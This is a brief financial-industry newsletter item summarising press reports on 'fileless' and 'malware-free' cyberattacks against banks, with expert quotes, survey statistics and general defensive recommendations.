“Fileless” is banks' latest cybersecurity concern
Cyberattacks on banks and others have seemingly disappeared, making them all the more dangerous.
Malicious software, the type criminals use to steal online banking login credentials from customer or employee desktops, has been getting more stealthy and effective over time, as its authors get progressively better at evading antivirus and antimalware programs (cf. Smart Insights Weekly #16-12, #16-49, #16-50).
But there’s an emerging generation of malware that’s even sneakier. It’s not only designed to escape detection, it can lurk in computer memory or a legitimate computer tool, where normal security software can’t see it, reports American Banker.
Malicious code that runs in memory is called “fileless.”
Another, more invasive version of this is “malware-free intrusions,” where the adversary embeds its attack script in legitimate tools already present in the environment.
“You cannot block them because they’re used for legitimate purposes in your environment, but they’re being compromised to assist in the intrusion for nefarious purpose,” said Dmitri Alperovitch, co-founder and CTO of CrowdStrike, the security company brought in to investigate the hack on the Democratic National Committee (cf. SIW #16-27).
Most existing antivirus and whitelisting technologies cannot cope with these attacks because they’re looking for malware and there’s no malware for them to find, he said.
The terms “fileless” and “malware-free” may evolve over time. But they represent a genre in cyberattacks that banks need to watch.
A recent example was the hack of the Democratic National Committee (cf. SIW #16-27). That attack was carried out almost entirely using PowerShell and WMI, Alperovitch said. (Powershell is a Microsoft task automation and configuration management framework. Windows Management Instrumentation, or WMI, is a set of specifications from Microsoft for consolidating the management of devices and applications in a network.)
Research from Carbon Black, a security company, has found that 97% of organizations were targeted by a nonmalware attack in 2016.
However, banks are specifically being targeted by the newer attack type. Carbon Black’s research found more than 40% growth in attacks targeting financial institutions in 2016.
Most cyberattacks on banks start with phishing—convincing-looking emails with malicious attachments. Bank IT departments usually aim to put those attachments in a sandbox, where they can be evaluated in a safe place.
The newer, fileless versions are encrypted and have program logic that can detect they’re in a sandbox and, understanding what a sandbox looks for, won’t run. To IT, they look like benign Word attachments or PDF files.
An antidote to this is alternative technology called content destruction and reconstruction or regeneration. It strips any suspect content out of an email attachment and just delivers the safe piece.
Cyberattackers also know that typical antimalware tools look for files that have been written to disk. By writing the attack in memory or burying it in a registry, they fly under the radar.
Banks should assume they’ve been hacked and do a compromise assessment. And they should try to get full visibility across their environment.